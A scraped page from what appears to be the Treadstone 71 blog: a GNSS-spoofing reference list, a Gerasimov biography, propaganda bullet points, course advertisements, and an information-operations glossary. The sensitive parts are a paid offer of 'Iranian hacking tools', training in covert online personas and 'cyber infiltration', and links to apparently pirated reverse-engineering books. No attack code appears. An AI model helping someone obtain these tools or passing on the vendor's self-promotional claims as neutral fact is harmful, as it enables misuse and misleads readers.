Schmidt, D.et.al., (5/2016) A Survey and Analysis of the GNSS Spoofing Threat and Countermeasures, ACM Computing Surveys, Vol 48, No 4, Article 64

Sickle, J.V. (8/25/2017) GEOG 862 GPS and GNSS for Geospatial Professionals, Lessons 1-10 complete, Penn State University, College of Earth and Mineral Sciences  https://www.e-education.psu.edu/geog862/node/1407 [ Superb Course on the subject]

Sterling, J. 8/21/2017) A Spate of US Navy warship accidents in Asia since January, CNNNEWS. http://www.cnn.com/2017/08/21/politics/navy-ships-accidents/index.html

Tucker, P., e. al. (9/2017) Beyond GPS: Upgrading the Military’s Navigation-and-timing Backbone, Defense One, e-Book.

Volpe, J.A, (8/29/2001) Vulnerability Assessment of the Transportation Infrastructure Relying on the Global Positioning System, Final Report, Office of Assistant Secretary for Transportation Policy, U.S. Department of Transportation, John A Volpe Transportation Systems Center.

Warner, J.S. % Johnson, R.G. (2013) A Simple Demonstration That the Global Positioning System (GPS) is Vulnerable to Spoofing, Journal of Security Administration, https://pdfs.semanticscholar.org/8ddb/89f56dd3e2ae265047822bc47cfb06815d9a.pdf, LAUR-03-6163.

Warner, J.S. % Johnson, R.G. (2003) GPS Spoofing Countermeasures, Journal of Security Administration, LAUR-03-2384, Los Alamos, NM:  Los Alamos National Laboratory

Weise, E. (8/23/2017) Could Hackers Be Behind The U.S. Navy Collisions? USATODAY.

Patents

Berry, R. & Cook, C. (2016) Detection of wireless data jamming and spoofing, US 9466881 B1

 

Blogs

Banggood Blog (9/14/2017) Whats the difference between RHCP and LHCP antennae?     https://blog.banggood.com/rhcp-and-lhcp-whats-the-difference-29046.html

King Blog (9/14/2017) what is the difference between Azimuth and Elevation? https://kingconnect.com/what-is-the-difference-between-azimuth-and-elevation/

Mike Willis Blog (9/13/2017) Propagation. http://www.mike-willis.com/Tutorial/propagation.html

Law and Cyber Warfare Blog. Groll, E. (2017) Investigating if Destroyer Crash was Caused by a Cyber Attack, http://www.jlcw.org/u-s-navy-investigating-if-destroyer-crash-was-caused-by-cyberattack/

Wikipedia

Editor (8/31/2017) GPS Block IIIA, Wikipedia, https://en.wikipedia.org/wiki/GPS_Block_IIIA

Editor (9/14/2017) Circular polarization, Wikipedia, https://en.wikipedia.org/wiki/Circular_polarization

Editor (9/19/2017) Electromagnetic Spectrum, Wikipedia, https://en.wikipedia.org/wiki/Electromagnetic_spectrum

Editor (9/19/2017) Continuous-wave Radar, https://en.wikipedia.org/wiki/Continuous-wave_radar

Featured post

Treadstone 71 on I24News Live with David Shuster – 9/28/2017

  • Hybrid warfare – conventional, irregular, terrorist, criminal
  • Non-linear warfare includes those plus cyber, information, economic, diplomatic, political, cultural, religious, and social means

Treadstone 71 on I24News

  • Subvert the enemies social and political structure – political and social agitation, remove confidence in a system, sow seeds of discontent, pit brother against brother = create confusion and dissent. – Used to confuse, lie, misrepresent, destabilize, and facebooktwittererode the current social order the current political order
  • It can easily be said that social engineering is the exploitation of human behavior and trust.
  • Propaganda that fits my beliefs and further accentuates the ‘truth’ although false, in that belief
  • We plan… They plot. We are clever… They are sneaky. We form strategies… They conspire. We have convictions… They are fanatics.
  • The overwhelming preponderance of people have not freely decided what to believe, but, rather, have been socially conditioned (indoctrinated) into their beliefs.
  • Their thinking is largely comprised of stereotypes, caricatures, oversimplifications, sweeping generalizations, illusions, delusions, or self-serving rationalizations.
  • They see the world through ethnocentric and nationalistic eyes.
  • They stereotype people from other cultures.
  • They resent being “corrected,” disagreed with, or criticized. They want to be re-enforced, flattered and made to feel important.
  • We have a deep-seated sense of duty to authority- adults will do extreme things when instructed to do so by an authority figure
  • Social Validation (Consensus) – the behavior/opinions of similar others

I12149464887

Featured post

Valery Vasilevich Gerasimov – Валерий Васильевич Герасимов

Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation, General of the Army._64031862_gerasimov

Валерий Васильевич Герасимов

Born      8 September 1955 (age 62)

Kazan, Tatar Autonomous Soviet Socialist Republic

Married – one son

Russian hackers reportedly stole NSA data via Kaspersky Lab software

http://algo.fyi/5vhjug

Born on 8 September 1955 in the city of Kazan. In 1977, he graduated from the Kazan Higher Tank Command School named after the Presidium of the Supreme Soviet of the Tatar ASSR (Autonomous Soviet Socialist Republic). He commanded platoon, company, battalion in the Northern Group of Troops and Far Eastern Military District.

vg

After his graduation from the Military Academy of Armored Troops named after Marshal of the Soviet Union R.Ya. Malinovsky in the year of 1987, he served as the chief of headquarters and commander of tank regiment, the chief of headquarters of motorized rifle division in the Baltic Military District. From 1993 to 1995 — the commander of motorized rifle division in the North-Western Group of Troops.

After graduating from the Kazan Higher Tank Command School Gerasimov was the commander of a platoon, company, and battalion of the Far Eastern Military District. Later he was chief of staff of a tank regiment and then of a motorized rifle division in the Baltic Military District. From 1993 to 1995 he was the commander of the 144th Guards Motor Rifle Division in the Baltic Military District and then the North-Western Group of Forces.

After he graduated from the General Staff’s academy he was First Deputy Army Commander in the Moscow Military District and commander of the 58th Army in the North Caucasus Military District during the Second Chechen War. His involvement in the arrest of Yuri Budanov led to praise from journalist Anna Politkovskaya.

g3In 2006, he became commander of Leningrad Military District and moved to be the commander of Moscow Military District in 2009 and Central Military District in April 2012. On 23 December 2010, he became deputy Chief of the General Staff

In 1997 after his graduation from the Military Academy of the RF Armed Forces’ General Staff, he served as the First Deputy Commander of Army in the Moscow Military District, the Deputy Commander, Chief of Staff and Commander of the 58th Army in the North Caucasian Military District.

From 2003 to 2005 — the Chief of Staff of the Far Eastern Military District. From 2005 — the Chief of the Main Administration of Combat Training and Troops’ Service of the RF Armed Forces, and from December 2006 — the Chief of Staff of the North Caucasian Military District.vg4.png

In December 2006, he was assigned as the Commander of the Leningrad Military District, and in February 2009 — as the Commander of the Moscow Military District.

From December 2010 — the Deputy Chief of the General Staff of the Armed Forces of the Russian Federation.

From 26 April 2012 — the Commander of the Central Military District.

Gerasimovs-linjal

03-02By the RF Presidential Decree of 9 November 2012, he has been appointed the Chief of the General Staff of the Armed Forces of the Russian Federation / First Deputy Minister of Defence of the Russian Federation. He was appointed by President Vladimir Putin on 9 November 2012. Some authors credit Gerasimov as the person behind a so-called “Gerasimov doctrine” – currently prevalent in Russian military strategy – combining military, technological, information, diplomatic, economic, cultural and other tactics, which are then deployed towards one set of strategic objectives. This “political warfare” is preferred due to its comparatively low cost.

vg2

The previous Chief of General Staff, Army General Nikolay Makarov, was seen as close to Serduykov and was seen by commentators as likely to be replaced by new Defence Minister Sergey Shoygu. It has been reported that Makarov resigned, but he was formally dismissed by President Vladimir Putin. Other changes were the dismissal of Alexander Sukhorukov from the position of First Deputy Defence Minister and his replacement by Colonel General Arkady Bakhin, formerly commander of the Western Military District. Aerospace Defence Forces commander Colonel General Oleg Ostapenko was also promoted to Deputy Defence Minister. He was promoted to the highest rank in the Russian Army, General of the Army as of 2014. On September 15, 2016, he and Turkish chief of staff General Hulusi Akar conducted a

03-03

meeting on the future of Syria in the Ankara headquarters of the army. That meeting will result in tightened dealings between Russia and Turkey.

There is an old Soviet-era rhetorical device that a ‘warning’ or a ‘lesson’ from some other situation is used to outline intent and plan. The way that what purports to be an after-action take on the Arab Spring so closely maps across to what was done in Ukraine is striking. Presenting the Arab Spring–wrongly–as the results of covert Western operations allows Gerasimov the freedom to talk about what he may also want to talk about: how Russia can subvert and destroy states without direct, overt and large-scale military intervention. However, the assumption that this is a Western gambit primarily does appear genuinely-held. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

image_f02f46e5-5865-43de-957e-a19b266b57fb20170903_133742

VPK_08_476

In April 2014 Gerasimov was added to the list of persons against whom the European Union introduced sanctions “in respect of actions undermining or threatening the territorial integrity, sovereignty, and independence of Ukraine.”

Hero of the Russian Federation.

Personal decorations: Order for Military Merits, Order for Merits to the Fatherland 4th grade, Order for Service to the Homeland in the USSR’s Armed Forces 3rd grade, Order of St. George 4th grade, Order for Merits to the Fatherland with Swords 3rd grade, Order for Honor.

The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness.

For me, this is probably the most important line in the whole piece, so allow me to repeat it: The role of nonmilitary means of achieving political and strategic goals has grown, and, in many cases, they have exceeded the power of force of weapons in their effectiveness. In other words, this is an explicit recognition not only that all conflicts are actually means to political ends–the actual forces used are irrelevant–but that in the modern realities, Russia must look to non-military instruments increasingly. https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/

 https://warontherocks.com/2016/03/russian-hybrid-warfare-and-other-dark-arts/

 

 

 

Featured post

Hard nosed open source collection and analysis

Syrian violations of sanctions with Russian FSB assistance to manufacture ballistic vests – Not discovered by any organization other than Treadstone 71 – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/16/bulletproof/

Russian malware tied to BlackEnergy / Dragonfly embedded in PLC software at Delta Electronics Taiwan – before Symantec and all the large ‘cybersecurity’ firms – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2017/09/06/dragonflydelta/

Iranian hackers and their solutions penetration Saudi companies – Alfa-Shell / solevisible – Identified 10 months ago 12/2016 long before FireEye – No sensors, no aggregation of thousands of taps – Just hard-nosed open source collection and analysis

https://cybershafarat.com/2016/12/30/solevisible/

How much are you paying for you generic data feed?

Wired
Treadstone 71 – We See What Others Cannot

Featured post

Dru’a al-Waaqiah lil-Bedoon – Syrian Sanctions Busting with Russian Help

Past report on Syrian Government collusion with Russia to bypass sanctions against Syria. This instance involves acquiring materials and machines to manufacture their own body armor in Latakia by way of the UAE where a Syrian soldier working with a female FSB agent centralize the acquisitions.

Visas, passports, military IDs, fake names, bills of lading and more for your reading and review.

The Treadstone 71 Report (pdf) – Treadstone 71 – drua-alwaaqiah-lilboodoon

Treadstone 71 acquired supporting files and documents (30MB zip) – drua-rawfiles-treadstone71

https://treadstone71llc.files.wordpress.com/2014/10/hatem-deeb-_-vk.pdf 

https://treadstone71llc.files.wordpress.com/2014/10/zain-deeb-_-vk.pdf

https://cybershafarat.com/?p=524

http://www.treadstone71.com

Featured post

Treadstone 71 Announces Cyber Intelligence Capability Maturity Model

Treadstone 71 developed a maturity model to help organizations determine the maturity of their cyber intelligence initiatives against the cyber intelligence common body of knowledge (CICBOK). The model provides strategic and operational aspects of your cyber intelligence maturity, where it needs to go, and where you should concentrate your attention to create more value for your business. Nearly 8 years in the making, the Treadstone 71 Cyber Intelligence Maturity Model uses traditional tradecraft as delivered by Sherman Kent and Richards Heuer, intelligence community standards, analytic standards, and experiential knowledge derived from years of training, assessing, and building cyber intelligence programs.

The Treadstone 71 Cyber Intelligence Capability Maturity Model (T71-CICMM) is a methodology used to develop and refine an organization’s cyber intelligence program. Not only is the model educational and practical skills for learning and developing expertise, but also a roadmap for building a cyber intelligence program. More information is available here:

Treadstone 71 Cyber Intelligence Maturity Model

T71CICMM.png

Featured post

Status – Iranian Hacking Tools

Iranian Hacking Tools

One time, 24-hour access to download the as-is Iranian Hacking tools. Approximately 1.3GB of use-at-your-own-risk tools, videos, instructions, and other information.

$4,950.00

Many have requested access to the gigabytes of Iranian hacking tools Treadstone 71 has available. You may now access these tools via a payment to Treadstone 71.

Best Regards,

Treadstone 71

Featured post

It has not changed – Russian Maskirovka – Denial and Deception

I keep a vigil in a wilderness of mirrors
Where nothing here is ever what it seems

Yuri Nosenko

yuri

“Instead of being relieved to hear that the Soviets had not been involved in the assassination, James Jesus Angleton, the C.I.A.’s legendarily suspicious counterintelligence chief, and others in the spy trade thought Mr. Nosenko’s apparent defection was a trick.”

http://www.planetreg.com/T71IntelTraining including Cyber Counterintelligence Tradecraft 

“After all, the agency had suffered a series of setbacks, including the unmasking and execution of two Russian intelligence officials who had been spying for the C.I.A. inside the Soviet Union.”

Not much has changed with respect to Russian counterintelligence activities but for the medium of use. The Internet affords great opportunities for denial and deception, counterdenial and counterdeception, ruses, feints, doubleplays, and other methods of manipulation and influence management. Want to learn more? Try Treadstone 71’s Cyber Counterintelligence Tradecraft Certification – http://www.planetreg.com/T71IntelTraining

http://www.washingtonpost.com/wp-dyn/content/article/2008/08/26/AR2008082603493

htmlhttp://mcadams.posc.mu.edu/russ/jfkinfo/jfk8/hscanpol.htm2017-04-28_7-19-37

Featured post

Intelligence for the C-Suite and Stakeholders

This is a one-day course designed to educate corporate leadership and stakeholders in cyber and threat intelligence.  There is a general awareness of the need to establish intelligence functions. Many organizations do not have a fundamental understanding of what intelligence is, where the function should reside, how it is different from business and competitive intelligence while understanding the overlaps and natural points of integration. This one day course targets corporate leadership delivering a clear and coherent training that equips stakeholders with the understanding and tools they need to assist in building a successful intelligence program.


Registration Information – Dates and Times TBD

Course High-Level Outline

  • Using Strategic Intelligence
  • Organization and Focus of the Class
  • Background on Strategic Intelligence and Analysis
  • Approaches and Processes
  • Strategic Plan development, acceptance, and dissemination
    • Mission
    • Vision
    • Guiding Principles
    • Roles and Responsibilities
    • Threat Intelligence Perspective
    • Business Intelligence Perspective
    • Competitive Intelligence Perspective
    • Intelligence Strategic Challenges
    • Goals and Initiatives
    • Next Steps
    • Roadmap
  • Stakeholder checklist and stakeholder management groups with strategic and tactical activities definition for intelligence, description of needs and products. This will include:
  • The Future Use of Strategic Intelligence
  • Intelligence: Role, Definitions, and Concepts
  • Basic Concepts Concerning Intelligence
  • The Strategic Intelligence Process – Operations to Tactics
  • The Role of Strategic Intelligence and Its Impact on Stakeholders
    • Operational, Technical, Tactical
  • Why Stakeholders and Executives Need Strategic Analysis:
  • Strategic Analysis Leading to Strategic Decisions
  • Implementing Intelligence Programs
    • The Treadstone 71 Method (Experience with several program builds globally)
  • Challenges for Stakeholders to Accept Intelligence
  • Stakeholder Views: Impact on Intelligence
  • Intelligence as Catalyst for Stakeholders
  • Integrating Analytical Support and the Stakeholder Thought Process
  • Stakeholders and Self-Directed Strategic Processes, Procedures, Methods
  • The Role of Intelligence Management
  • Issues, Tactics, Techniques, Methods, and Principles
  • Managing Intelligence Projects
  • Providing Focused Leadership
    • Leading the Team
    • Understanding Issues and the Process
    • Analysis Overview
    • Collection Management
    • Production Management
      • Evaluation
      • Analysis
      • Integration
      • Interpretation
    • Types of Analysis
      • 14 Types of Analysis
    • Analytic Writing
      • ICD 203, 206, 208
      • Organization, Evidence, Argument, Sources, Pitfalls
      • Use the Title
      • Who/What, Why Now, So What, Impact so far, Outlook, Implications
      • BLUF and AIMS
      • Supervisory Actions
      • Summary Paragraphs
      • Alternative Analysis
      • Clarity and Brevity
      • Peer review
      • Reports and Reporting
        • Feedback
    • Pre-Mortem
    • Post-Mortem
    • Know your professor, get an A – Communicating Up
      • Relevance, Timeliness, Completeness, Accuracy, Usability
    • Briefing Rules
  • Intelligence Analysts and Self-Management
    • High-Level Tasks
  • Analyst Activities
    • Rules for developing analysts – Alignment and as collectors
    • The Role, Responsibilities, and Functions of the Analyst
    • The Analyst’s Roles and Responsibilities – RACI(s)
    • What the Analyst will face
    • Job Descriptions
  • Conclusion
    • The Executive / Stakeholder’s Roadmap
Corporate stakeholders risk investing large amounts of time and money with little positive effect their security, corporate strategies, and business direction. The C-Suite and Stakeholders participating in this course ensures their understanding of the discipline required to build a successful program. The course helps align information security, incident response, security operations, threat and cyber intelligence with the business.
Featured post

Training Report – Treadstone 71 Cyber Intelligence Tradecraft Professional Certification

“This past week, I had the absolute pleasure of attending the 5-day Treadstone 71 Cyber Intelligence Tradecraft Professional Certification course along with three of my colleagues.  Mr. Jeff Bardin was the instructor and his knowledge and depth in this area is exceptionally impressive!cyberintelt71

The training allows students to gain a better understanding of the cyber intelligence life cycle, the role and value of cyber intelligence relative to online targeting and collection, in modern organizations, businesses, and governments at the completion of this course. In addition, students understand: the methods of online anonymity, the fundamentals behind cyber intelligence collection and analysis, and how these current methods can be employed in our organizations to assist in online operational security and in defense against adversaries. The course was a combination of lecture, hands-on and student deliverables seen by many as an apprenticeship. We completed 4 case studies throughout the week in varying subjects such as Iranian hackers, high financial networks, Russian SCADA equipment, etc.

I would highly recommend this course to anyone looking to further their knowledge in the cyber area.  It will also allow you to become a better intelligence analyst, as a whole.  Overall, it was a truly fantastic learning experience that is applicable in both our personal, as well as professional lives.  I most certainly have a new appreciation for online security and safety.” – Recently certified student February 2017

Featured post

Suggested Reads by Iranian Hackers

https://www.cs.utexas.edu/~jason777/Programming/Connect Four/Connect Four/Project/2011 – Assembly Language for x86 Processors 6e (Prentice Hall).pdf
[2011_Assembly_Language_for_x86_Processors.pdf] 1.8 MB

http://profmsaeed.org/wp-content/uploads/2015/02/IntelAsseblyLanguage.pdf

staff.ustc.edu.cn/~sycheng/ssat/books/The.IDA.Pro.Book.2ed.pdf

http://www.foo.be/cours/dess-20122013/b/Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005).pdf

http://www.chinastor.org/upload/2015-08/15081917086229.pdf

https://doc.lagout.org/network/2_Hack/Reverse Engineering of Object Oriented Code.pdf

https://download.adamas.ai/dlbase/ebooks/VX_related/Identifying Malicious Code Through Reverse Engineering.pdf

http://www.staroceans.org/kernel-and-driver/Assembly Language Step-By-Step – Programming with Linux, 3rd edition (Wiley, 2009, 0470497025).pdf

coolfire.insomnia247.nl/Hacker Disassembling Uncovered.pdf

Featured post

2017 Training Courses – Treadstone 71

2017 Training Dates

Main Page to Treadstone 71 Training – 2017

(or on demand including in-house or by location)

Treadstone 71 is working with FS-ISAC for training in London, Singapore, Malaysia, and Australia.

FS-ISAC Sponsored Courses:

Cyber Intelligence Tradecraft Training
3-7 April | Reston, VA
More | Register
Cyber Intelligence Tradecraft Training
8-12 May | London
More | Register
Cyber Intelligence Tradecraft Training
19-23 June | Reston, VA
More | Register
Cyber Intelligence Tradecraft Training
21-25 August | Reston, VA
More | Register

Featured post

Full Suite of Cyber-Threat Intelligence and Counterintelligence Courses Ready for Global Delivery

Treadstone 71 today announced a full suite of Cyber and Threat Intelligence and CounterIntelligence training courses. The courses drive the expansion of Treadstone 71’s accelerated, academically validated, intelligence training to global markets. Treadstone 71 delivers courses in California, Virginia, Canada, the United Kingdom, and the Netherlands and is set to expand to the Middle East and Asia later this year. (www.planetreg.com/T71IntelTraining)

Treadstone 71 offers a compelling business model that delivers rapid cyber and threat intelligence strategic planning, program build, and targeted training in sectors such as financial services, government, healthcare, energy, and other critical infrastructure verticals. Treadstone 71’s format, curriculum, and instruction model are helping meet critical global demand for cyber and threat intelligence and analysis expertise. Treadstone 71 training provide graduates with an attractive pathway to compensation increases, career progression, and much-needed attention to intelligence. The organization has been teaching cyber intelligence at the Master’s level and commercially for seven years. New courses include a focus on campaign management, the use of Tor, Tails, I2P, and Maltego as well as covering persona development and management. Students create a series of identities, character development, and dimensions, storyline, plot synopsis, story drive and limit, story weaving, applicability, scope, tools to be used, methods of interaction with other identities, engaging secondary characters, refining targeting while developing a campaign to gain street credentials.

“Our courses provide academic instruction combined with real-world, hands-on collection, analysis, analytic writing, dissemination, and briefings that many liken to an apprenticeship,” said Jeff Bardin, Chief Intelligence Officer for Treadstone 71. “Our curriculum follows the teachings of Sherman Kent and Richards Heuer giving students the tools necessary to perform targeted collection, structured analysis while authoring reports modeled after intelligence community standards. We teach methods of cyber infiltration, information and influence operations, counterintelligence strategies, mission based counterintelligence, denial and deception, and counter-denial and deception.”

Treadstone 71 courses are validated and proven by intelligence professionals creating job-ready threat intelligence professionals for global organizations suffering a talent shortage. “Intelligence analysis as an inherently intellectual activity that requires knowledge, judgment, and a degree of intuition,” continued Bardin. “Treadstone 71’s intelligence, counterintelligence, and clandestine cyber HUMINT training and services help organizations transform information into intelligence pertinent to their organization.”

Analysis includes integrating, evaluating, and analyzing all available data — which is often fragmented and even contradictory — and preparing intelligence products. Despite all the attention focused on the operational (collection) side of intelligence, analysis is the core of the process to inform corporate stakeholders. Analysis as more than just describing what is happening and why; identifying a range of opportunities… Intelligence Analysis is the key to making sense of the data and finding opportunities to take action. Analysis expands beyond the technical focus of today providing organizations with core capabilities for business, competitive, cyber, and threat intelligence.

Treadstone 71’s Cyber Intelligence Tradecraft Certification is the gold standard in the industry today derived from both academia and from Treadstone 71’s experience in building cyber intelligence programs at Fortune 500 organizations worldwide.

Treadstone 71

888.714.0071 – osint@treadstone71.comhttp://www.planetreg.com/T71IntelTraining

Featured post

We Are in a State of Cyber Cold War?

Wisdom begins with the definition of terms – Socrates

Many believe that we are not in some sort of state of cyber warfare. Many believe that it is only influence operations. These are the same people who are selling you security technologies and services to protect your environment. They believe calling our current state cyber war is hype. They fact that they believe this is demonstrated in their technologies that have double and triple downed on solutions that do not work. Solutions based solely on see, detect, and arrest. A paradigm proven over the past 20 years to be a paradigm of failure. The game of many a vendor (not all) is to generate revenue off your fear. A fear that can be remedied if we fix information security by first starting to fix information technology (see Cyber Security Predictions – Not Reality TV – Just Daytime Entertainment). One of the problems we have is standard taxonomy and glossary. Most do not have an understanding of the basics of intelligence and war. Most feel the need to apply physical characteristics to cyber actions in order for those actions to be taken as some sort of warfare. This is a major misnomer. My request here is for you to read the limited glossary items below. Once you have read these items, think of where we are today with respect to cyber security. If after reading and applying critical thinking to the terms and our current state of cyber security you do not believe we are in a state of cyber cold war, then provide some well thought out comments as to what state we are in fact in.

Information Operations (IO). The integrated employment of the core capabilities of electronic warfare, computer network operations, psychological operations, military deception, and operations security, in concert with specified supporting and related capabilities, to influence, disrupt, corrupt or usurp adversarial human and automated decision making while protecting our own. (JP 1-02)

           This includes five core capabilities incorporated into IO

  1. Electronic warfare is any action involving the use of the electromagnetic spectrum or directed energy to control the spectrum, attack of an enemy, or impede enemy assaults via the spectrum.
  2. Computer Network Operations (CNO)
    1. Comprised of computer network attack, computer network defense, and related computer network exploitation enabling operations (JP 1-02)
  3. Psychological operations
    1. Planned operations to convey selected information and indicators to foreign audiences to influence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originator’s objectives. (JP 1-02 and JP 3-13.2)
  4. Military Deception
    1. Actions executed to deliberately mislead adversary military decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission. (JP 1-02)
    2. According to JP 3-13.4, Counterintelligence provides the following for MILDEC planners:
    3. Identification and analysis of adversary intelligence systems to determine the best deception conduits;
    4. Establishment and control of deception conduits within the adversary intelligence system, also known as offensive CI operations;
    5. Participation in counterdeception operations;
    6. Identification and analysis of the adversary’s intelligence system and its susceptibility to deception and surprise; and
    7. Feedback regarding adversary intelligence system responses to deception operations.
  5. Operations Security

*******

Treadstone71 2017 Cyber Intel Courses – http://www.planetreg.com/T71IntelTraining

*******

OPSEC is a five-step iterative process that assists an organization in identifying specific pieces of information requiring protection and employing measures to protect them.

  1. Identification of Critical information: Critical information is information about friendly intentions, capabilities and activities that allow an adversary to plan effectively to disrupt their operations. U.S. Army Regulation 530-1 has redefined Critical Information into four broad categories, using the acronym CALI- Capabilities, Activities, Limitations (including vulnerabilities), and Intentions.This step results in the creation of a Critical Information List (CIL). This allows the organization for focus resources on vital information, rather than attempting to protect all classified or sensitive unclassified information. Critical information may include, but is not limited to, military deployment schedules, internal organizational information, details of security measures, etc.
  2. Analysis of Threats: A Threat comes from an adversary – any individual or group that may attempt to disrupt or compromise a friendly activity. Threat is further divided into adversaries with intent and capability. The greater the combined intent and capability of the adversary, the greater the threat. This step uses multiple sources, such as intelligence activities, law enforcement, and open source information to identify likely adversaries to a planned operation and prioritize their degree of threat.
  3. Analysis of Vulnerabilities: Examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary’s intelligence collection capabilities identified in the previous action. Threat can be thought of as the strength of the adversaries, while vulnerability can be thought of as the weakness of friendly organizations.
  4. Assessment of Risk: First, planners analyze the vulnerabilities identified in the previous action and identify possible OPSEC measures for each vulnerability. Second, specific OPSEC measures are selected for execution based upon a risk assessment done by the commander and staff. Risk is calculated based on the probability of Critical Information release and the impact if such as release occurs. Probability is further subdivided into the level of threat and the level of vulnerability. The core premise of the subdivision is that the probability of compromise is greatest when the threat is very capable and dedicated, while friendly organizations are simultaneously exposed.
  5. Application of Appropriate OPSEC Measures: The command implements the OPSEC measures selected in the assessment of risk action or, in the case of planned future operations and activities, includes the measures in specific OPSEC plans. Countermeasures must be continually monitored to ensure that they continue to protect current information against relevant threats.The U.S. Army Regulation 530-1 refers to “Measures” as the overarching term, with categories of “Action Control” (controlling one’s own actions); “Countermeasures” (countering adversary intelligence collection); and “Counteranalysis” (creating difficulty for adversary analysts seeking to predict friendly intent) as tools to help an OPSEC professional protect Critical Information.

Offensive Cyber Operations. Programs and activities that through the use of cyberspace, 1) actively gather information from computers, information systems or networks or 20 manipulate, disrupt, deny, degrade, or destroy targeted adversary computers, information systems, or networks. (NSPD-38)

Cold War – a state of political hostility between countries characterized by threats, propaganda, and other measures short of open warfare – a conflict or dispute between two groups that does not involve actual fighting.

2017-01-16_18-37-11.jpg

Cyber War – the use of computer technology to disrupt the activities of a state or organization, especially the deliberate attacking of information systems for strategic or military purposes. Cyber warfare involves the actions by a nation-state or international organization to attack and attempt to damage another nation’s computers or information networks through, for example, computer viruses or denial-of-service attacks.

Try this link for more definitions https://ccdcoe.org/cyber-definitions.html

To repeat. think of where we are today with respect to cyber security. Apply critical thinking to the terms and our current state of cyber security. Assess our relationship with Russia. Provide some well thought out comments as to what state we are in fact in if you believe we are not in a state of cyber cold war with Russia. If we are not, then how would you define our current state?

Treadstone 71

 

 

 

Featured post

Cyber Security Predictions – Not Even Reality TV – Just Daytime Entertainment

The plethora of 2017 cyber security predictions do nothing but distract practitioners from executing actual controls and methods of defense and prevention. Each year we get slammed with predictions that are never followed, are common sense, and serve to market and sell products and services. The so-called information and cyber security experts, many times self-proclaimed, spew predictions on all potential areas. This is not much more than fake news and methods to direct readers to vendor products. The vendor products that claim to solve these predictions and therefore, become self-fulfilling prophecies. For the most part, once the predictions are published, the follow-up to their success is non-existent. Their purposes are to market and sell, drive perception, manage the market, and drive a false sense of vendor expertise.

We should focus on actual problem resolution and change the failed paradigm within which security exists. We continue to propagate vendor products and services that do not work, only treating the symptoms. This is not much different from the pharmaceutical industry that markets pills to you each evening during the news and prime time. Pills that treat symptoms and cause more side effects than they do solve issues. Advertisements that drive up the cost of the product manipulating the market and those that prescribe the ‘solutions’ to recommend purchase.

The only way we change this paradigm, and I mean we, is to push back on these vendors to solve problems and quit selling products that treat symptoms. We must also correct our own internal behaviors. A few weeks ago, I published a potential list of 12 items to change this paradigm (the 12th is a shameless plug so 11). They are listed below.

We need to forget the Jerry Springer-like entertainment of annual cyber predictions and focus on solving the hard problems we face.

What does Treadstone 71 seek? We seek an end to the noise and an understanding that our information, our intellectual property, and our way of life is under constant siege. We are in a cyber war with skirmishes and battles occurring 24×7. We need to direct the carpetbagging vendors to cease in their war profiteering and take a moral stance in fighting our adversaries. We also need to correct and adjust how we run IT and information security. The list of 11 is below. We welcome your comments, your additions, and your assistance in this call to action to change the failed paradigm.

Treadstone 71

  1. All CIOs must have served as a CISO for at least four years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least two technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code the works correctly and does not create vulnerabilities.

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

  1. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls.
  2. New regulations to enforce security and privacy, demanding disclosure of breaches,  fining companies and individuals for negligence are put in place, at once.
  3. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.
  4. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Decided to add a real 12:

  1. Let’s create a focused call to action to change the paradigm. Open to suggestions, dedicated forums, public push to change vendors, public push to force IT to change.

Call to Action!

Featured post

Igor Valentinovich Korobov, the current chief of a military intelligence agency Игорь Валентинович Коробов

korobov-bio

Игорь Валентинович Коробов

Treadstone 71 2017 Intelligence Training Courses – Sign up now or inquire about how to have us come onto your site to training.

Glavnoje Razvedyvatel’noje Upravlenije
ГРУ ГШ ВС РФ
Главное Разведывательное Управление

Agency overview
Formed May 7, 1992
Preceding agencies
Jurisdiction President of Russia
Headquarters Grizodubovoy str. 3, Moscow
Minister responsible
Agency executive
  • Igor Korobov, Chairman
Parent agency Ministry of Defense
Child agencies
  • Svyazinformsoyuz Company
  • Directorate for Space Intelligence

440px-generalstaff_central_dep-svg

Featured post

The 12 Days of Cyber Christmas

…or What I want for Cyber Security and Intelligence Christmas 2016

  1. All CIOs must have served as a CISO for at least 4 years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least 2 technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
